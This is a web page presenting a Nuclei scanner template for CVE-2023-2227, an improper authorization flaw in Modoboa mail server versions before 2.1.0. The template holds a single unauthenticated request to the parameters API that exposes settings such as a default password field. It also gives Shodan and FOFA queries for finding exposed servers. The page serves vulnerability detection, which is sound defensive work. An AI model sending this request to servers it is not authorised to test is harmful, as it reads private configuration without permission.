Modoboa < 2.1.0 - Improper Authorization
ID: CVE-2023-2227
Severity: critical
Author: ritikchaddha,princechaddha
Tags: cve,cve2023,modoboa,exposure,disclosure
Description
Section titled “Description”Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.
YAML Source
Section titled “YAML Source”id: CVE-2023-2227
info: name: Modoboa < 2.1.0 - Improper Authorization author: ritikchaddha,princechaddha severity: critical description: | Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0. reference: - https://huntr.com/bounties/351f9055-2008-4af0-b820-01ff66678bf3 - https://github.com/modoboa/modoboa/commit/7bcd3f6eb264d4e3e01071c97c2bac51cdd6fe97 - https://nvd.nist.gov/vuln/detail/CVE-2023-2227 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2023-2227 cwe-id: CWE-285 epss-score: 0.01292 epss-percentile: 0.85804 cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: modoboa product: modoboa shodan-query: - "http.favicon.hash:1949005079" - http.html:"modoboa" fofa-query: - "body=\"Modoboa\"" - body="modoboa" - icon_hash=1949005079 tags: cve,cve2023,modoboa,exposure,disclosure
http: - raw: - | GET /api/v2/parameters/core/ HTTP/1.1 Host: {{Hostname}} User-Agent: 7h3h4ckv157
matchers-condition: and matchers: - type: word part: body words: - 'label":' - 'default_password":' - 'authentication_type":"local' condition: and
- type: word part: header words: - 'application/json'
- type: status status: - 200# digest: 490a004630440220776ea07d8a55c5c57fea061d84bf4c8ae1a41caa63ce4b801602e67e37e554f402203684b3f38653aec0f4e455f4a8fbc0f80e141ffe72b6b66790e22b296f024865:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-2227.yaml"